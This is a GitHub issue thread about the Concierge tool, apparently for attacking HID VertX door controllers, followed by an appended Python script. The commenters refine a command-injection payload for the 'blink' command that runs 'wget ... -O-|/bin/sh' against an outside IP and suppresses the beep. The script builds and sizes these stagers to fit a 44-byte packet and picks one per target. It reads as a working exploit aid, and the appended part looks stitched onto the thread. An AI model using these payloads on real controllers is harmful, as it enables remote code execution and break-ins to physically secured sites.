HID command_blink_on prevent beep #6

Open
bcoles opened this issue Jun 2, 2018 · 3 comments

bcoles commented Jun 2, 2018

I noticed the following on your blog:

I’m putting the finishing touches on a bash script that executes the above attack and another that cleans up afterwards. Along with the script, I’m doing some testing on timing. I think it’s possible to send the commands quickly enough that, while all three payloads execute, only one beep is heard. Once those scripts are complete, you’ll be able to find them here: https://github.com/lixmk/Concierge.

You may be pleased to note that a value of -1 will prevent the device from beeping. This comes at the cost of one additional byte, thus decreasing the available space for the specified shell command by one byte.

A value of 1 will cause the device to beep for one second.
A value of 0 will cause the device to beep infinitely.
ASCII values such as A will also cause the device to beep infinitely.
A value of -1 will cause the blink executable to throw an error and exit, however the subsequent shell commands encompassed in backticks will still be executed by the system shell.

# ./blink -1
WARNING: blink: duration (-1) not in range 1-65535.
Usage: blink [<secs>]

lixmk (Owner) commented Jun 3, 2018

Thanks for the info. I'll check all the payloads and see if they have the spare byte. If not, I'll see if I can find more ways to optimize space.

bcoles commented Jun 9, 2018

I took a quick look at your script.

A worst case scenario for your existing implementation is...

1`wget http://123.123.123.123:12345/ -O-|/bin/sh`

... 49 characters long. This is already too big, with a maximum packet length of 44.

You could save some bytes by dropping the URL scheme and URL path:

1`wget 123.123.123.123:12345 -O/tmp/a`

...totaling 39 characters, allowing space for the extra byte.

The obvious downside of this approach is requiring three requests - one to drop the payload file, another to execute, and a third to remove the payload file. Also, dropping the URL scheme prevents serving the payload over HTTPS, however this was a shortcoming of the existing implementation anyway.

lixmk (Owner) commented Jun 9, 2018

If I recall correctly, some board types' version of wget doesn't allow dropping the http://. Also, piping straight to /bin/sh was intentional for the exact reason you mentioned. Additionally, it means you don't need to write to disk. The original version of the script (might have been the .sh version) used the 3 request design.

I realize I never tested piping to sh without the full path. It should be in $PATH. If that works, that should be the solution. Gonna try to find time tonight or tomorrow to test.
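The two comments above are really a byte-budget exercise: the blink argument is `<secs>` followed by a backticked command, the whole thing has to fit in the 44-byte packet the thread mentions, and the no-beep `-1` prefix costs one more byte than `1`. The following is an added example, not code from Concierge or from either commenter; it composes the payload, checks it against the limit, and walks through the stager variants the thread discusses (with or without the URL scheme, with or without the path, `/bin/sh` versus bare `sh`, pipe to stdout versus write to disk). The host `123.123.123.123`, port `12345` and the `/tmp/a` drop path are constructed values taken from the thread's own illustration; the lengths are computed by the code rather than copied from the comments.

```python
# Added example (not Concierge's own code): size a VertX blink payload of
# the form <secs>`<cmd>` against the 44-byte packet limit from the thread.

MAX_PAYLOAD = 44        # maximum packet length per the thread
NO_BEEP_SECS = "-1"     # blink rejects -1 and exits, but the shell has
                        # already expanded the backticks, so <cmd> still runs
ONE_BEEP_SECS = "1"     # a single one-second beep


def build_payload(cmd: str, secs: str = ONE_BEEP_SECS) -> str:
    """Wrap a shell command in the blink argument: <secs>`<cmd>`."""
    if "`" in cmd:
        raise ValueError("command must not itself contain a backtick")
    return f"{secs}`{cmd}`"


def fits(payload: str, limit: int = MAX_PAYLOAD) -> bool:
    """True if the payload fits in the packet (ASCII bytes, no terminator)."""
    return len(payload.encode("ascii")) <= limit


def stager_variants(host: str, port: int, path: str = "/") -> dict:
    """Candidate wget stagers, longest first.

    Each later entry drops something discussed in the thread: the /bin/
    prefix on sh, the URL path, the URL scheme (some boards' wget will
    not accept a bare host:port), and finally pipe-to-sh versus writing
    the payload to disk for a separate execute/cleanup request.
    """
    base = f"{host}:{port}"
    return {
        "scheme+path, pipe to /bin/sh": f"wget http://{base}{path} -O-|/bin/sh",
        "scheme+path, pipe to sh":      f"wget http://{base}{path} -O-|sh",
        "scheme only, pipe to sh":      f"wget http://{base} -O-|sh",
        "no scheme, pipe to sh":        f"wget {base} -O-|sh",
        "no scheme, write to disk":     f"wget {base} -O/tmp/a",
    }


def plan(host: str, port: int, quiet: bool = True, allow_bare_url: bool = True):
    """Return (label, payload) for the first variant that fits the limit.

    quiet=True spends the extra byte on the -1 no-beep prefix;
    allow_bare_url=False keeps 'http://' for boards whose wget needs it.
    """
    secs = NO_BEEP_SECS if quiet else ONE_BEEP_SECS
    for label, cmd in stager_variants(host, port).items():
        if not allow_bare_url and not cmd.startswith("wget http://"):
            continue
        payload = build_payload(cmd, secs)
        if fits(payload):
            return label, payload
    return None


if __name__ == "__main__":
    # Constructed host/port from the thread's illustration.
    for label, cmd in stager_variants("123.123.123.123", 12345).items():
        for secs in (ONE_BEEP_SECS, NO_BEEP_SECS):
            p = build_payload(cmd, secs)
            print(f"{len(p):2d} {'ok ' if fits(p) else 'BIG'} [{label}] {p}")
    print(plan("123.123.123.123", 12345, quiet=True, allow_bare_url=False))
```

With the thread's 15-character IP and 5-digit port, the original `-O-|/bin/sh` form is 49 bytes and does not fit; bare `sh` with the trailing `/` dropped comes to exactly 44 bytes with the `-1` prefix, so the no-beep variant fits without touching `http://`. A shorter address or port frees more room, so the planner should be run per target rather than hard-coding one stager.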
